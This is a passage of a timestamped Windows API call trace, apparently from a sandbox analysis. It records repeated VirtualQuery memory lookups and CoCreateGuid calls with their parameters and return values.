	[0062.296] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.296] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.296] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.297] VirtualQuery (in: lpAddress=0x278aa0, lpBuffer=0x3500279960, dwLength=0x30 | out: lpBuffer=0x3500279960*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.297] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.297] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.297] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.297] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.298] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.298] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.298] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.298] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.298] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.299] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.299] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.299] VirtualQuery (in: lpAddress=0x278c20, lpBuffer=0x3500279ae0, dwLength=0x30 | out: lpBuffer=0x3500279ae0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.299] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.299] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.299] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.300] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.300] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x96b1b5b9, Data2=0x6896, Data3=0x4e2c, Data4=([0]=0x9e, [1]=0xf6, [2]=0x4c, [3]=0xaf, [4]=0x74, [5]=0x5a, [6]=0x19, [7]=0x3c))) returned 0x0
	[0062.300] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x9e0afc25, Data2=0x5f91, Data3=0x4787, Data4=([0]=0x92, [1]=0x73, [2]=0x1e, [3]=0x90, [4]=0xa7, [5]=0x17, [6]=0x3f, [7]=0x53))) returned 0x0
	[0062.301] VirtualQuery (in: lpAddress=0x2787e0, lpBuffer=0x35002796a0, dwLength=0x30 | out: lpBuffer=0x35002796a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.301] VirtualQuery (in: lpAddress=0x2784b0, lpBuffer=0x3500279370, dwLength=0x30 | out: lpBuffer=0x3500279370*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.302] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.303] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.303] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.303] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.304] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.304] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.305] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.305] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.305] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.306] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.306] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.306] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.307] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.308] VirtualQuery (in: lpAddress=0x2790f0, lpBuffer=0x3500279fb0, dwLength=0x30 | out: lpBuffer=0x3500279fb0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.309] VirtualQuery (in: lpAddress=0x2790f0, lpBuffer=0x3500279fb0, dwLength=0x30 | out: lpBuffer=0x3500279fb0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.324] VirtualQuery (in: lpAddress=0x2790f0, lpBuffer=0x3500279fb0, dwLength=0x30 | out: lpBuffer=0x3500279fb0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.324] VirtualQuery (in: lpAddress=0x2790f0, lpBuffer=0x3500279fb0, dwLength=0x30 | out: lpBuffer=0x3500279fb0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.325] VirtualQuery (in: lpAddress=0x2787e0, lpBuffer=0x35002796a0, dwLength=0x30 | out: lpBuffer=0x35002796a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.325] VirtualQuery (in: lpAddress=0x278870, lpBuffer=0x3500279730, dwLength=0x30 | out: lpBuffer=0x3500279730*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.325] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.325] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.325] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.326] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.326] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.326] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.326] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.326] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.326] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.327] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.327] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.327] VirtualQuery (in: lpAddress=0x278c20, lpBuffer=0x3500279ae0, dwLength=0x30 | out: lpBuffer=0x3500279ae0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.327] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.327] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.328] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.328] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.328] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.328] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.328] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x589ade77, Data2=0x1cdd, Data3=0x4c2a, Data4=([0]=0xbd, [1]=0x1d, [2]=0x4, [3]=0xc6, [4]=0x5, [5]=0x52, [6]=0xf8, [7]=0x5b))) returned 0x0
	[0062.329] VirtualQuery (in: lpAddress=0x2787e0, lpBuffer=0x35002796a0, dwLength=0x30 | out: lpBuffer=0x35002796a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.329] VirtualQuery (in: lpAddress=0x278870, lpBuffer=0x3500279730, dwLength=0x30 | out: lpBuffer=0x3500279730*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.329] VirtualQuery (in: lpAddress=0x278a90, lpBuffer=0x3500279950, dwLength=0x30 | out: lpBuffer=0x3500279950*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.329] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x59a26f9e, Data2=0xd76c, Data3=0x4940, Data4=([0]=0xbd, [1]=0x1d, [2]=0xff, [3]=0x71, [4]=0x89, [5]=0x85, [6]=0x19, [7]=0x4d))) returned 0x0
	[0062.330] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc5468679, Data2=0xebf5, Data3=0x4e20, Data4=([0]=0xb2, [1]=0x15, [2]=0xdd, [3]=0xc3, [4]=0xab, [5]=0x4e, [6]=0xeb, [7]=0x64))) returned 0x0
	[0062.330] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x3b302930, Data2=0x49aa, Data3=0x41e4, Data4=([0]=0x90, [1]=0xea, [2]=0x5d, [3]=0xfb, [4]=0x86, [5]=0x59, [6]=0x4c, [7]=0xd5))) returned 0x0
	[0062.330] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x5bc31175, Data2=0xcc89, Data3=0x4759, Data4=([0]=0x9f, [1]=0xf4, [2]=0x63, [3]=0x6, [4]=0xab, [5]=0x84, [6]=0x83, [7]=0x1b))) returned 0x0
	[0062.330] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xf9308bc2, Data2=0xd4c3, Data3=0x49f2, Data4=([0]=0xb3, [1]=0xfe, [2]=0x20, [3]=0x53, [4]=0x50, [5]=0x29, [6]=0x31, [7]=0x4c))) returned 0x0
	[0062.330] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x1ed9ebf, Data2=0x2ca9, Data3=0x4fbf, Data4=([0]=0x8a, [1]=0x84, [2]=0x9b, [3]=0x17, [4]=0x78, [5]=0x1f, [6]=0x44, [7]=0x31))) returned 0x0
	[0062.331] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc41786be, Data2=0x8000, Data3=0x498b, Data4=([0]=0xbf, [1]=0x2e, [2]=0x29, [3]=0x9, [4]=0x44, [5]=0x37, [6]=0xe1, [7]=0xc6))) returned 0x0
	[0062.331] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc603f1e0, Data2=0x34a2, Data3=0x4dcd, Data4=([0]=0xb7, [1]=0x45, [2]=0xa2, [3]=0x6, [4]=0x41, [5]=0xba, [6]=0x99, [7]=0x95))) returned 0x0
	[0062.331] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.331] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.332] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.332] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.332] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.332] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.332] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.332] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.333] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.333] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.333] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.333] VirtualQuery (in: lpAddress=0x278650, lpBuffer=0x3500279510, dwLength=0x30 | out: lpBuffer=0x3500279510*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.333] VirtualQuery (in: lpAddress=0x2786e0, lpBuffer=0x35002795a0, dwLength=0x30 | out: lpBuffer=0x35002795a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.334] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.334] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
